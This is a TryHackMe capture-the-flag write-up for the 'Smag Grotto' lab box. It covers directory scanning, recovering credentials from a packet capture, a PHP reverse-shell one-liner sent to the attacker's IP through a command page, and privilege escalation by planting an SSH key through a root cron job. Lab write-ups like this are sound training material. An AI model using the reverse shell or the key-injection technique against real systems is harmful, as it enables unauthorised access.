THM - Smag Grotto
Introduction
Do you remember how to analyse packets?
This is a easy rated box. Let’s begin.
Ports
nmap says we’ve got 22 (SSH) and 80 (HTTP) only.
Webserver
There’s not much on the home page for the website, so we’ll run a quick gobuster:
root@kali:/opt/tryhackme/smag# gobuster dir -u http://10.10.184.160 -w /usr/share/dirb/wordlists/common.txt
This turns up one interesting directory - mail. Checking that we get a message about a packet capture along with a download link. It says you have to download it with wget, although I’m sure that’s not actually necessary. Let’s do it anyway:
PCAP
We can open the packet capture in Wireshark and it’s very straightforward, we find a POST request with some important details, being a new subdomain:
http://development.smag.thm/login.php
and some credentials: helpdesk:REDACTED
We add development.smag.thm to our /etc/hosts and continue.
Admin.php
Once we go to development.smag.thm/login.php and authenticate, we get a page that says ‘enter a command’. Any number of commands can be tried but none of them appear to do anything….until you start a listener and try a reverse shell:
php -r '$sock=fsockopen("10.9.10.123",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Thanks, pentestmonkey.
On the box
As usual I run linpeas; this time we find a cron job:
root /bin/cat /opt/.backups/jake_id_rsa.pub.backup > /home/jake/.ssh/authorized_keys
So the job is copying jake’s public key to the authorized keys file. Good to know.
SSH-keygen
Let’s generate a new SSH key with ssh-keygen:
Once that’s done (with the passphrase of ‘yolo’), we can get it on the box and we can append it to the jake_id_rsa.pub.backup file and wait for the cron job to run.
Jake
Now we can login as jake with our passphrase:
root@kali:/opt/tryhackme/smag# ssh -i id_rsa jake@smag.thm
Running sudo -l gives us this:
And GTFOBins does the rest: